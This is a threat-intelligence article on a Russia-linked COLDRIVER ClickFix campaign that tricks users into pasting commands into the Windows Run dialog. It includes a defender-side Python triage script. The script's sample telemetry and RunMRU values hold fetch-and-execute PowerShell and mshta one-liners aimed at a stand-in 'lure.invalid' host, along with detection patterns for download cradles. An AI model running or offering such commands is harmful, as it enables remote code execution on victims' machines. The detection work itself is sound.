Russia-linked Coldriver hackers add ClickFix technique to their arsenal

Zscaler ThreatLabz has uncovered a new multi-stage ClickFix campaign potentially targeting Russian civil society groups, NGOs, and think tanks. The operation is believed to be the work of the Russia-linked advanced persistent threat (APT) group COLDRIVER, also known as Star Blizzard, Callisto, and UNC4057.

The multi-stage approach represents an evolution in Coldriver's tactics, which previously relied mostly on credential phishing. The ClickFix technique deceives victims into executing malicious commands themselves via the Windows Run dialog box.

The infection chain begins with a deceptive webpage purporting to offer information for Russian civil society members. When a user interacts with a fake Cloudflare Turnstile checkbox on the site, malicious JavaScript silently copies a command to the user's clipboard. The page then presents prompts encouraging the user to paste and execute the command manually, which helps the attack bypass automated defenses, since the user, not a browser exploit, launches the payload.

Upon execution, the command drops BAITSWITCH, a lightweight downloader (Machinerie.dll), which establishes persistence on the target system and fetches stager payloads. The payloads deploy SIMPLEFIX, a PowerShell-based backdoor, granting the attackers remote access.
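Because the ClickFix step relies on the victim pasting a one-liner into the Run dialog, defenders have two cheap signals to triage: process-creation telemetry in which a script host is spawned directly by explorer.exe (the parent of anything launched from Win+R) with download or obfuscation flags, and the RunMRU registry key, which records what a user typed into the Run dialog. The following Python script is an added example written for this article, not code from Zscaler ThreatLabz or from the campaign; the list of script hosts, the suspicious-flag patterns, the event field names and all sample events and registry values are constructed assumptions for illustration, and nothing here reproduces the campaign's actual command.

```python
"""Heuristic triage for ClickFix-style "paste into Win+R" execution.

Assumed defender-side signals (example code, not from the original article):
  1. Process-creation events (Sysmon ID 1 / Security 4688 style) where a
     script host is a direct child of explorer.exe, which is how the Run
     dialog launches commands.
  2. HKCU\\...\\Explorer\\RunMRU, whose values hold '<command>\\1' and whose
     MRUList value gives most-recent-first ordering.
All sample data below is constructed for this example.
"""
import re
from typing import Dict, List, Optional

# Script hosts and LOLBins a pasted one-liner is likely to invoke (assumed list).
RUN_DIALOG_HOSTS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "certutil.exe", "curl.exe", "rundll32.exe",
}

# Command-line traits that separate a pasted payload from ordinary use of Run.
SUSPICIOUS_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "eval_cradle": re.compile(r"\biex\b|invoke-expression|downloadstring|downloadfile", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command(cmdline: str) -> List[str]:
    """Names of every suspicious pattern present in the command line."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmdline)]


def triage_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Flag a process-creation event if it looks like a pasted Run-dialog payload."""
    if basename(event["parent"]) != "explorer.exe":
        return None                      # not launched from the shell / Run dialog
    image = basename(event["image"])
    if image not in RUN_DIALOG_HOSTS:
        return None                      # ordinary application, not a script host
    reasons = score_command(event["cmdline"])
    if not reasons:
        return None                      # script host, but nothing payload-like
    return {"image": image, "reasons": reasons, "cmdline": event["cmdline"]}


def triage_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [f for f in (triage_event(e) for e in events) if f is not None]


def parse_run_mru(values: Dict[str, str]) -> List[str]:
    """Return RunMRU commands most-recent first, stripping the trailing '\\1'."""
    commands = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def triage_run_mru(values: Dict[str, str]) -> List[Dict[str, object]]:
    """Apply the same command-line heuristics to what the user typed into Run."""
    findings = []
    for cmd in parse_run_mru(values):
        tokens = cmd.split()
        host = basename(tokens[0]) if tokens else ""
        if host in RUN_DIALOG_HOSTS or host + ".exe" in RUN_DIALOG_HOSTS:
            reasons = score_command(cmd)
            if reasons:
                findings.append({"cmdline": cmd, "reasons": reasons})
    return findings


# Constructed sample telemetry; the URL uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "iwr https://lure.invalid/stage1 | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"parent": r"C:\Program Files\Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File .\\build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://lure.invalid/verify.hta"},
]

# Constructed RunMRU values as exported from the registry (order: c, a, b).
SAMPLE_RUN_MRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "winword\\1",
    "c": 'powershell -w hidden -nop -c "iwr https://lure.invalid/stage1 | iex"\\1',
}

if __name__ == "__main__":
    for finding in triage_events(SAMPLE_EVENTS):
        print("process:", finding)
    for finding in triage_run_mru(SAMPLE_RUN_MRU):
        print("runmru: ", finding)
```

The parent-process check is what keeps the heuristic quiet in practice: PowerShell launched from a terminal, an IDE or a scheduled task never has explorer.exe as its parent, so only shell- and Run-dialog-initiated script hosts reach the pattern scoring. The RunMRU pass is useful in incident response because it survives even when process telemetry was not being collected at the time.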

ThreatLabz attributes this campaign to Coldriver with moderate confidence, based on code similarities, target profiles, and overlaps in tactics, techniques, and procedures (TTPs). The group is known for targeting journalists, human rights defenders, and dissidents both in Russia and abroad.
